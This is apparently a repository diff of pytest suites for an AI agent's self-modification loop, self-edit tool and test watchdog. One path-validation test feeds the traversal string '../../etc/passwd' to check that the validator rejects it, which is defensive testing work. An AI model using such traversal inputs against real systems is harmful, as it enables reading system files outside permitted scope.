assert tool._validate_plan(plan) is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditToolExecution:
|
||||
"""Edit execution tests."""
|
||||
|
||||
async def test_strip_code_fences(self, temp_repo):
|
||||
"""Should strip markdown code fences."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
content = "```python\ndef test(): pass\n```"
|
||||
result = tool._strip_code_fences(content)
|
||||
|
||||
assert "```" not in result
|
||||
assert "def test(): pass" in result
|
||||
|
||||
async def test_parse_list(self, temp_repo):
|
||||
"""Should parse comma-separated lists."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
assert tool._parse_list("a, b, c") == ["a", "b", "c"]
|
||||
assert tool._parse_list("none") == []
|
||||
assert tool._parse_list("") == []
|
||||
assert tool._parse_list("N/A") == []
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditToolIntegration:
|
||||
"""Integration tests with mocked dependencies."""
|
||||
|
||||
async def test_successful_edit_flow(self, temp_repo, mock_llm):
|
||||
"""Test complete successful edit flow."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=mock_llm)
|
||||
|
||||
# Mock Aider to succeed
|
||||
with patch.object(tool, '_aider_available', return_value=False):
|
||||
with patch.object(tool, '_execute_direct_edit') as mock_exec:
|
||||
mock_exec.return_value = {
|
||||
"success": True,
|
||||
"test_output": "1 passed",
|
||||
}
|
||||
|
||||
result = await tool.execute("Add error handling")
|
||||
|
||||
assert result.success is True
|
||||
assert result.attempt_id is not None
|
||||
|
||||
async def test_failed_edit_with_rollback(self, temp_repo, mock_llm):
|
||||
"""Test failed edit with rollback."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=mock_llm)
|
||||
|
||||
# Mock execution to always fail
|
||||
with patch.object(tool, '_execute_edit') as mock_exec:
|
||||
mock_exec.return_value = {
|
||||
"success": False,
|
||||
"error": "Tests failed",
|
||||
"test_output": "1 failed",
|
||||
}
|
||||
|
||||
result = await tool.execute("Add broken feature")
|
||||
|
||||
assert result.success is False
|
||||
assert result.attempt_id is not None
|
||||
assert "failed" in result.message.lower() or "retry" in result.message.lower()
|
||||
|
||||
async def test_preflight_failure(self, temp_repo):
|
||||
"""Should fail early if preflight checks fail."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
# Make repo dirty
|
||||
(temp_repo / "dirty.txt").write_text("dirty")
|
||||
|
||||
result = await tool.execute("Some task")
|
||||
|
||||
assert result.success is False
|
||||
assert "pre-flight" in result.message.lower()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditMCPRegistration:
|
||||
"""MCP tool registration tests."""
|
||||
|
||||
async def test_register_self_edit_tool(self):
|
||||
"""Should register with MCP registry."""
|
||||
mock_registry = MagicMock()
|
||||
mock_llm = AsyncMock()
|
||||
|
||||
register_self_edit_tool(mock_registry, mock_llm)
|
||||
|
||||
mock_registry.register.assert_called_once()
|
||||
call_args = mock_registry.register.call_args
|
||||
|
||||
assert call_args.kwargs["name"] == "self_edit"
|
||||
assert call_args.kwargs["requires_confirmation"] is True
|
||||
assert "self_coding" in call_args.kwargs["category"]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditGlobalTool:
|
||||
"""Global tool instance tests."""
|
||||
|
||||
async def test_self_edit_tool_singleton(self, temp_repo):
|
||||
"""Should use singleton pattern."""
|
||||
from tools import self_edit as self_edit_module
|
||||
|
||||
# Reset singleton
|
||||
self_edit_module._self_edit_tool = None
|
||||
|
||||
# First call should initialize
|
||||
with patch.object(SelfEditTool, '__init__', return_value=None) as mock_init:
|
||||
mock_init.return_value = None
|
||||
|
||||
with patch.object(SelfEditTool, 'execute') as mock_execute:
|
||||
mock_execute.return_value = SelfEditResult(
|
||||
success=True,
|
||||
message="Test",
|
||||
)
|
||||
|
||||
await self_edit_tool("Test task")
|
||||
|
||||
mock_init.assert_called_once()
|
||||
mock_execute.assert_called_once()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestSelfEditErrorHandling:
|
||||
"""Error handling tests."""
|
||||
|
||||
async def test_exception_handling(self, temp_repo):
|
||||
"""Should handle exceptions gracefully."""
|
||||
tool = SelfEditTool(repo_path=temp_repo)
|
||||
|
||||
# Mock preflight to raise exception
|
||||
with patch.object(tool, '_preflight_checks', side_effect=Exception("Unexpected")):
|
||||
result = await tool.execute("Test task")
|
||||
|
||||
assert result.success is False
|
||||
assert "exception" in result.message.lower()
|
||||
|
||||
async def test_llm_failure_fallback(self, temp_repo, mock_llm):
|
||||
"""Should fallback when LLM fails."""
|
||||
tool = SelfEditTool(repo_path=temp_repo, llm_adapter=mock_llm)
|
||||
await tool._ensure_indexed()
|
||||
|
||||
# Mock LLM to fail
|
||||
mock_llm.chat.side_effect = Exception("LLM timeout")
|
||||
|
||||
plan = await tool._plan_edit(
|
||||
task_description="Test",
|
||||
relevant_files=["src/app.py"],
|
||||
similar_attempts=[],
|
||||
)
|
||||
|
||||
# Should return fallback plan
|
||||
assert isinstance(plan, EditPlan)
|
||||
assert len(plan.files_to_modify) > 0
|
||||
450
tests/self_coding/test_self_modify.py
Normal file
450
tests/self_coding/test_self_modify.py
Normal file
@@ -0,0 +1,450 @@
|
||||
"""Tests for the self-modification loop (self_modify/loop.py).
|
||||
|
||||
All tests are fully mocked — no Ollama, no real file I/O, no git.
|
||||
"""
|
||||
|
||||
from unittest.mock import MagicMock, patch
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_modify.loop import SelfModifyLoop, ModifyRequest, ModifyResult
|
||||
|
||||
|
||||
# ── Dataclass tests ───────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestModifyRequest:
|
||||
def test_defaults(self):
|
||||
req = ModifyRequest(instruction="Fix the bug")
|
||||
assert req.instruction == "Fix the bug"
|
||||
assert req.target_files == []
|
||||
assert req.dry_run is False
|
||||
|
||||
def test_with_target_files(self):
|
||||
req = ModifyRequest(
|
||||
instruction="Add docstring",
|
||||
target_files=["src/foo.py"],
|
||||
dry_run=True,
|
||||
)
|
||||
assert req.target_files == ["src/foo.py"]
|
||||
assert req.dry_run is True
|
||||
|
||||
|
||||
class TestModifyResult:
|
||||
def test_success_result(self):
|
||||
result = ModifyResult(
|
||||
success=True,
|
||||
files_changed=["src/foo.py"],
|
||||
test_passed=True,
|
||||
commit_sha="abc12345",
|
||||
branch_name="timmy/self-modify-123",
|
||||
llm_response="...",
|
||||
attempts=1,
|
||||
)
|
||||
assert result.success
|
||||
assert result.commit_sha == "abc12345"
|
||||
assert result.error is None
|
||||
assert result.autonomous_cycles == 0
|
||||
|
||||
def test_failure_result(self):
|
||||
result = ModifyResult(success=False, error="something broke")
|
||||
assert not result.success
|
||||
assert result.error == "something broke"
|
||||
assert result.files_changed == []
|
||||
|
||||
|
||||
# ── SelfModifyLoop unit tests ────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestSelfModifyLoop:
|
||||
def test_init_defaults(self):
|
||||
loop = SelfModifyLoop()
|
||||
assert loop._max_retries == 2
|
||||
|
||||
def test_init_custom_retries(self):
|
||||
loop = SelfModifyLoop(max_retries=5)
|
||||
assert loop._max_retries == 5
|
||||
|
||||
def test_init_backend(self):
|
||||
loop = SelfModifyLoop(backend="anthropic")
|
||||
assert loop._backend == "anthropic"
|
||||
|
||||
def test_init_autonomous(self):
|
||||
loop = SelfModifyLoop(autonomous=True, max_autonomous_cycles=5)
|
||||
assert loop._autonomous is True
|
||||
assert loop._max_autonomous_cycles == 5
|
||||
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_run_disabled(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = False
|
||||
loop = SelfModifyLoop()
|
||||
result = loop.run(ModifyRequest(instruction="test"))
|
||||
assert not result.success
|
||||
assert "disabled" in result.error.lower()
|
||||
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_run_no_target_files(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 0
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
loop = SelfModifyLoop()
|
||||
loop._infer_target_files = MagicMock(return_value=[])
|
||||
result = loop.run(ModifyRequest(instruction="do something vague"))
|
||||
assert not result.success
|
||||
assert "no target files" in result.error.lower()
|
||||
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_run_success_path(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 2
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
|
||||
loop = SelfModifyLoop()
|
||||
loop._read_files = MagicMock(return_value={"src/foo.py": "old content"})
|
||||
loop._generate_edits = MagicMock(
|
||||
return_value=({"src/foo.py": "x = 1\n"}, "llm raw")
|
||||
)
|
||||
loop._write_files = MagicMock(return_value=["src/foo.py"])
|
||||
loop._run_tests = MagicMock(return_value=(True, "5 passed"))
|
||||
loop._git_commit = MagicMock(return_value="abc12345")
|
||||
loop._validate_paths = MagicMock()
|
||||
|
||||
result = loop.run(
|
||||
ModifyRequest(instruction="Add docstring", target_files=["src/foo.py"])
|
||||
)
|
||||
|
||||
assert result.success
|
||||
assert result.test_passed
|
||||
assert result.commit_sha == "abc12345"
|
||||
assert result.files_changed == ["src/foo.py"]
|
||||
loop._run_tests.assert_called_once()
|
||||
loop._git_commit.assert_called_once()
|
||||
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_run_test_failure_reverts(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 0
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
|
||||
loop = SelfModifyLoop(max_retries=0)
|
||||
loop._read_files = MagicMock(return_value={"src/foo.py": "old content"})
|
||||
loop._generate_edits = MagicMock(
|
||||
return_value=({"src/foo.py": "x = 1\n"}, "llm raw")
|
||||
)
|
||||
loop._write_files = MagicMock(return_value=["src/foo.py"])
|
||||
loop._run_tests = MagicMock(return_value=(False, "1 failed"))
|
||||
loop._revert_files = MagicMock()
|
||||
loop._validate_paths = MagicMock()
|
||||
|
||||
result = loop.run(
|
||||
ModifyRequest(instruction="Break it", target_files=["src/foo.py"])
|
||||
)
|
||||
|
||||
assert not result.success
|
||||
assert not result.test_passed
|
||||
loop._revert_files.assert_called()
|
||||
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_dry_run(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 2
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
|
||||
loop = SelfModifyLoop()
|
||||
loop._read_files = MagicMock(return_value={"src/foo.py": "old content"})
|
||||
loop._generate_edits = MagicMock(
|
||||
return_value=({"src/foo.py": "x = 1\n"}, "llm raw")
|
||||
)
|
||||
loop._validate_paths = MagicMock()
|
||||
|
||||
result = loop.run(
|
||||
ModifyRequest(
|
||||
instruction="Add docstring",
|
||||
target_files=["src/foo.py"],
|
||||
dry_run=True,
|
||||
)
|
||||
)
|
||||
|
||||
assert result.success
|
||||
assert result.files_changed == ["src/foo.py"]
|
||||
|
||||
|
||||
# ── Syntax validation tests ─────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestSyntaxValidation:
|
||||
def test_valid_python_passes(self):
|
||||
loop = SelfModifyLoop()
|
||||
errors = loop._validate_syntax({"src/foo.py": "x = 1\nprint(x)\n"})
|
||||
assert errors == {}
|
||||
|
||||
def test_invalid_python_caught(self):
|
||||
loop = SelfModifyLoop()
|
||||
errors = loop._validate_syntax({"src/foo.py": "def foo(\n"})
|
||||
assert "src/foo.py" in errors
|
||||
assert "line" in errors["src/foo.py"]
|
||||
|
||||
def test_unterminated_string_caught(self):
|
||||
loop = SelfModifyLoop()
|
||||
bad_code = '"""\nTIMMY = """\nstuff\n"""\n'
|
||||
errors = loop._validate_syntax({"src/foo.py": bad_code})
|
||||
# This specific code is actually valid, but let's test truly broken code
|
||||
broken = '"""\nunclosed string\n'
|
||||
errors = loop._validate_syntax({"src/foo.py": broken})
|
||||
assert "src/foo.py" in errors
|
||||
|
||||
def test_non_python_files_skipped(self):
|
||||
loop = SelfModifyLoop()
|
||||
errors = loop._validate_syntax({"README.md": "this is not python {{{}"})
|
||||
assert errors == {}
|
||||
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_syntax_error_skips_write(self, mock_settings):
|
||||
"""When LLM produces invalid syntax, we skip writing and retry."""
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 1
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
|
||||
loop = SelfModifyLoop(max_retries=1)
|
||||
loop._read_files = MagicMock(return_value={"src/foo.py": "x = 1\n"})
|
||||
# First call returns broken syntax, second returns valid
|
||||
loop._generate_edits = MagicMock(side_effect=[
|
||||
({"src/foo.py": "def foo(\n"}, "bad llm"),
|
||||
({"src/foo.py": "def foo():\n pass\n"}, "good llm"),
|
||||
])
|
||||
loop._write_files = MagicMock(return_value=["src/foo.py"])
|
||||
loop._run_tests = MagicMock(return_value=(True, "passed"))
|
||||
loop._git_commit = MagicMock(return_value="abc123")
|
||||
loop._validate_paths = MagicMock()
|
||||
|
||||
result = loop.run(
|
||||
ModifyRequest(instruction="Fix foo", target_files=["src/foo.py"])
|
||||
)
|
||||
|
||||
assert result.success
|
||||
# _write_files should only be called once (for the valid attempt)
|
||||
loop._write_files.assert_called_once()
|
||||
|
||||
|
||||
# ── Multi-backend tests ──────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestBackendResolution:
|
||||
def test_resolve_ollama(self):
|
||||
loop = SelfModifyLoop(backend="ollama")
|
||||
assert loop._resolve_backend() == "ollama"
|
||||
|
||||
def test_resolve_anthropic(self):
|
||||
loop = SelfModifyLoop(backend="anthropic")
|
||||
assert loop._resolve_backend() == "anthropic"
|
||||
|
||||
@patch.dict("os.environ", {"ANTHROPIC_API_KEY": "sk-test-123"})
|
||||
def test_resolve_auto_with_key(self):
|
||||
loop = SelfModifyLoop(backend="auto")
|
||||
assert loop._resolve_backend() == "anthropic"
|
||||
|
||||
@patch.dict("os.environ", {}, clear=True)
|
||||
def test_resolve_auto_without_key(self):
|
||||
loop = SelfModifyLoop(backend="auto")
|
||||
assert loop._resolve_backend() == "ollama"
|
||||
|
||||
|
||||
# ── Autonomous loop tests ────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestAutonomousLoop:
|
||||
@patch("self_modify.loop.os.environ", {"SELF_MODIFY_SKIP_BRANCH": "1"})
|
||||
@patch("self_modify.loop.settings")
|
||||
def test_autonomous_retries_after_failure(self, mock_settings):
|
||||
mock_settings.self_modify_enabled = True
|
||||
mock_settings.self_modify_max_retries = 0
|
||||
mock_settings.self_modify_allowed_dirs = "src,tests"
|
||||
mock_settings.self_modify_backend = "ollama"
|
||||
|
||||
loop = SelfModifyLoop(max_retries=0, autonomous=True, max_autonomous_cycles=2)
|
||||
loop._validate_paths = MagicMock()
|
||||
loop._read_files = MagicMock(return_value={"src/foo.py": "x = 1\n"})
|
||||
|
||||
# First run fails, autonomous cycle 1 succeeds
|
||||
call_count = [0]
|
||||
|
||||
def fake_generate(instruction, contents, prev_test_output=None, prev_syntax_errors=None):
|
||||
call_count[0] += 1
|
||||
return ({"src/foo.py": "x = 2\n"}, "llm raw")
|
||||
|
||||
loop._generate_edits = MagicMock(side_effect=fake_generate)
|
||||
loop._write_files = MagicMock(return_value=["src/foo.py"])
|
||||
loop._revert_files = MagicMock()
|
||||
|
||||
# First call fails tests, second succeeds
|
||||
test_results = [(False, "FAILED"), (True, "PASSED")]
|
||||
loop._run_tests = MagicMock(side_effect=test_results)
|
||||
loop._git_commit = MagicMock(return_value="abc123")
|
||||
loop._diagnose_failure = MagicMock(return_value="Fix: do X instead of Y")
|
||||
|
||||
result = loop.run(
|
||||
ModifyRequest(instruction="Fix foo", target_files=["src/foo.py"])
|
||||
)
|
||||
|
||||
assert result.success
|
||||
assert result.autonomous_cycles == 1
|
||||
loop._diagnose_failure.assert_called_once()
|
||||
|
||||
def test_diagnose_failure_reads_report(self, tmp_path):
|
||||
report = tmp_path / "report.md"
|
||||
report.write_text("# Report\n**Error:** SyntaxError line 5\n")
|
||||
|
||||
loop = SelfModifyLoop(backend="ollama")
|
||||
loop._call_llm = MagicMock(return_value="ROOT CAUSE: Missing closing paren")
|
||||
|
||||
diagnosis = loop._diagnose_failure(report)
|
||||
assert "Missing closing paren" in diagnosis
|
||||
loop._call_llm.assert_called_once()
|
||||
|
||||
def test_diagnose_failure_handles_missing_report(self, tmp_path):
|
||||
loop = SelfModifyLoop(backend="ollama")
|
||||
result = loop._diagnose_failure(tmp_path / "nonexistent.md")
|
||||
assert result is None
|
||||
|
||||
|
||||
# ── Path validation tests ─────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestPathValidation:
|
||||
def test_rejects_path_outside_repo(self):
|
||||
loop = SelfModifyLoop(repo_path=Path("/tmp/test-repo"))
|
||||
with pytest.raises(ValueError, match="escapes repository"):
|
||||
loop._validate_paths(["../../etc/passwd"])
|
||||
|
||||
def test_rejects_path_outside_allowed_dirs(self):
|
||||
loop = SelfModifyLoop(repo_path=Path("/tmp/test-repo"))
|
||||
with pytest.raises(ValueError, match="not in allowed directories"):
|
||||
loop._validate_paths(["docs/secret.py"])
|
||||
|
||||
def test_accepts_src_path(self):
|
||||
loop = SelfModifyLoop(repo_path=Path("/tmp/test-repo"))
|
||||
loop._validate_paths(["src/some_module.py"])
|
||||
|
||||
def test_accepts_tests_path(self):
|
||||
loop = SelfModifyLoop(repo_path=Path("/tmp/test-repo"))
|
||||
loop._validate_paths(["tests/test_something.py"])
|
||||
|
||||
|
||||
# ── File inference tests ──────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestFileInference:
|
||||
def test_infer_explicit_py_path(self):
|
||||
loop = SelfModifyLoop()
|
||||
files = loop._infer_target_files("fix bug in src/dashboard/app.py")
|
||||
assert "src/dashboard/app.py" in files
|
||||
|
||||
def test_infer_from_keyword_config(self):
|
||||
loop = SelfModifyLoop()
|
||||
files = loop._infer_target_files("update the config to add a new setting")
|
||||
assert "src/config.py" in files
|
||||
|
||||
def test_infer_from_keyword_agent(self):
|
||||
loop = SelfModifyLoop()
|
||||
files = loop._infer_target_files("modify the agent prompt")
|
||||
assert "src/timmy/agent.py" in files
|
||||
|
||||
def test_infer_returns_empty_for_vague(self):
|
||||
loop = SelfModifyLoop()
|
||||
files = loop._infer_target_files("do something cool")
|
||||
assert files == []
|
||||
|
||||
|
||||
# ── NLU intent tests ──────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestCodeIntent:
|
||||
def test_detects_modify_code(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("modify the code in config.py")
|
||||
assert intent.name == "code"
|
||||
|
||||
def test_detects_self_modify(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("self-modify to add a new endpoint")
|
||||
assert intent.name == "code"
|
||||
|
||||
def test_detects_edit_source(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("edit the source to fix the bug")
|
||||
assert intent.name == "code"
|
||||
|
||||
def test_detects_update_your_code(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("update your code to handle errors")
|
||||
assert intent.name == "code"
|
||||
|
||||
def test_detects_fix_function(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("fix the function that calculates totals")
|
||||
assert intent.name == "code"
|
||||
|
||||
def test_does_not_match_general_chat(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("tell me about the weather today")
|
||||
assert intent.name == "chat"
|
||||
|
||||
def test_extracts_target_file_entity(self):
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
intent = detect_intent("modify file src/config.py to add debug flag")
|
||||
assert intent.entities.get("target_file") == "src/config.py"
|
||||
|
||||
|
||||
# ── Route tests ───────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestSelfModifyRoutes:
|
||||
def test_status_endpoint(self, client):
|
||||
resp = client.get("/self-modify/status")
|
||||
assert resp.status_code == 200
|
||||
data = resp.json()
|
||||
assert "enabled" in data
|
||||
assert data["enabled"] is False # Default
|
||||
|
||||
def test_run_when_disabled(self, client):
|
||||
resp = client.post("/self-modify/run", data={"instruction": "test"})
|
||||
assert resp.status_code == 403
|
||||
|
||||
|
||||
# ── DirectToolExecutor integration ────────────────────────────────────────────
|
||||
|
||||
|
||||
class TestDirectToolExecutor:
|
||||
def test_code_task_falls_back_when_disabled(self):
|
||||
from swarm.tool_executor import DirectToolExecutor
|
||||
|
||||
executor = DirectToolExecutor("forge", "forge-test-001")
|
||||
result = executor.execute_with_tools("modify the code to fix bug")
|
||||
# Should fall back to simulated since self_modify_enabled=False
|
||||
assert isinstance(result, dict)
|
||||
assert "result" in result or "success" in result
|
||||
|
||||
def test_non_code_task_delegates_to_parent(self):
|
||||
from swarm.tool_executor import DirectToolExecutor
|
||||
|
||||
executor = DirectToolExecutor("echo", "echo-test-001")
|
||||
result = executor.execute_with_tools("search for information")
|
||||
assert isinstance(result, dict)
|
||||
54
tests/self_coding/test_watchdog.py
Normal file
54
tests/self_coding/test_watchdog.py
Normal file
@@ -0,0 +1,54 @@
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from self_tdd.watchdog import _run_tests
|
||||
|
||||
|
||||
def _mock_result(returncode: int, stdout: str = "", stderr: str = "") -> MagicMock:
|
||||
m = MagicMock()
|
||||
m.returncode = returncode
|
||||
m.stdout = stdout
|
||||
m.stderr = stderr
|
||||
return m
|
||||
|
||||
|
||||
def test_run_tests_returns_true_when_suite_passes():
|
||||
with patch("self_tdd.watchdog.subprocess.run", return_value=_mock_result(0, "5 passed")):
|
||||
passed, _ = _run_tests()
|
||||
assert passed is True
|
||||
|
||||
|
||||
def test_run_tests_returns_false_when_suite_fails():
|
||||
with patch("self_tdd.watchdog.subprocess.run", return_value=_mock_result(1, "1 failed")):
|
||||
passed, _ = _run_tests()
|
||||
assert passed is False
|
||||
|
||||
|
||||
def test_run_tests_output_includes_stdout():
|
||||
with patch("self_tdd.watchdog.subprocess.run", return_value=_mock_result(0, stdout="5 passed")):
|
||||
_, output = _run_tests()
|
||||
assert "5 passed" in output
|
||||
|
||||
|
||||
def test_run_tests_output_combines_stdout_and_stderr():
|
||||
with patch(
|
||||
"self_tdd.watchdog.subprocess.run",
|
||||
return_value=_mock_result(1, stdout="FAILED test_foo", stderr="ImportError: no module named bar"),
|
||||
):
|
||||
_, output = _run_tests()
|
||||
assert "FAILED test_foo" in output
|
||||
assert "ImportError" in output
|
||||
|
||||
|
||||
def test_run_tests_invokes_pytest_with_correct_flags():
|
||||
with patch("self_tdd.watchdog.subprocess.run", return_value=_mock_result(0)) as mock_run:
|
||||
_run_tests()
|
||||
cmd = mock_run.call_args[0][0]
|
||||
assert "pytest" in cmd
|
||||
assert "tests/" in cmd
|
||||
assert "--tb=short" in cmd
|
||||
|
||||
|
||||
def test_run_tests_uses_60s_timeout():
|
||||
with patch("self_tdd.watchdog.subprocess.run", return_value=_mock_result(0)) as mock_run:
|
||||
_run_tests()
|
||||
assert mock_run.call_args.kwargs["timeout"] == 60
|
||||
100
tests/self_coding/test_watchdog_functional.py
Normal file
100
tests/self_coding/test_watchdog_functional.py
Normal file
@@ -0,0 +1,100 @@
|
||||
"""Functional tests for self_tdd.watchdog — continuous test runner.
|
||||
|
||||
All subprocess calls are mocked to avoid running real pytest.
|
||||
"""
|
||||
|
||||
from unittest.mock import patch, MagicMock, call
|
||||
|
||||
import pytest
|
||||
|
||||
from self_tdd.watchdog import _run_tests, watch
|
||||
|
||||
|
||||
class TestRunTests:
|
||||
@patch("self_tdd.watchdog.subprocess.run")
|
||||
def test_run_tests_passing(self, mock_run):
|
||||
mock_run.return_value = MagicMock(
|
||||
returncode=0,
|
||||
stdout="5 passed\n",
|
||||
stderr="",
|
||||
)
|
||||
passed, output = _run_tests()
|
||||
assert passed is True
|
||||
assert "5 passed" in output
|
||||
|
||||
@patch("self_tdd.watchdog.subprocess.run")
|
||||
def test_run_tests_failing(self, mock_run):
|
||||
mock_run.return_value = MagicMock(
|
||||
returncode=1,
|
||||
stdout="2 failed, 3 passed\n",
|
||||
stderr="ERRORS",
|
||||
)
|
||||
passed, output = _run_tests()
|
||||
assert passed is False
|
||||
assert "2 failed" in output
|
||||
assert "ERRORS" in output
|
||||
|
||||
@patch("self_tdd.watchdog.subprocess.run")
|
||||
def test_run_tests_command_format(self, mock_run):
|
||||
mock_run.return_value = MagicMock(returncode=0, stdout="", stderr="")
|
||||
_run_tests()
|
||||
cmd = mock_run.call_args[0][0]
|
||||
assert "pytest" in " ".join(cmd)
|
||||
assert "tests/" in cmd
|
||||
assert "-q" in cmd
|
||||
assert "--tb=short" in cmd
|
||||
assert mock_run.call_args[1]["capture_output"] is True
|
||||
assert mock_run.call_args[1]["text"] is True
|
||||
|
||||
|
||||
class TestWatch:
|
||||
@patch("self_tdd.watchdog.time.sleep")
|
||||
@patch("self_tdd.watchdog._run_tests")
|
||||
@patch("self_tdd.watchdog.typer")
|
||||
def test_watch_first_pass(self, mock_typer, mock_tests, mock_sleep):
|
||||
"""First iteration: None→passing → should print green message."""
|
||||
call_count = 0
|
||||
|
||||
def side_effect():
|
||||
nonlocal call_count
|
||||
call_count += 1
|
||||
if call_count >= 2:
|
||||
raise KeyboardInterrupt
|
||||
return (True, "all good")
|
||||
|
||||
mock_tests.side_effect = side_effect
|
||||
watch(interval=10)
|
||||
# Should have printed green "All tests passing" message
|
||||
mock_typer.secho.assert_called()
|
||||
|
||||
@patch("self_tdd.watchdog.time.sleep")
|
||||
@patch("self_tdd.watchdog._run_tests")
|
||||
@patch("self_tdd.watchdog.typer")
|
||||
def test_watch_regression(self, mock_typer, mock_tests, mock_sleep):
|
||||
"""Regression: passing→failing → should print red message + output."""
|
||||
results = [(True, "ok"), (False, "FAILED: test_foo"), KeyboardInterrupt]
|
||||
idx = 0
|
||||
|
||||
def side_effect():
|
||||
nonlocal idx
|
||||
if idx >= len(results):
|
||||
raise KeyboardInterrupt
|
||||
r = results[idx]
|
||||
idx += 1
|
||||
if isinstance(r, type) and issubclass(r, BaseException):
|
||||
raise r()
|
||||
return r
|
||||
|
||||
mock_tests.side_effect = side_effect
|
||||
watch(interval=5)
|
||||
# Should have printed red "Regression detected" at some point
|
||||
secho_calls = [str(c) for c in mock_typer.secho.call_args_list]
|
||||
assert any("Regression" in c for c in secho_calls) or any("RED" in c for c in secho_calls)
|
||||
|
||||
@patch("self_tdd.watchdog.time.sleep")
|
||||
@patch("self_tdd.watchdog._run_tests")
|
||||
@patch("self_tdd.watchdog.typer")
|
||||
def test_watch_keyboard_interrupt(self, mock_typer, mock_tests, mock_sleep):
|
||||
mock_tests.side_effect = KeyboardInterrupt
|
||||
watch(interval=60)
|
||||
mock_typer.echo.assert_called() # "Watchdog stopped"
|
||||
Reference in New Issue
Block a user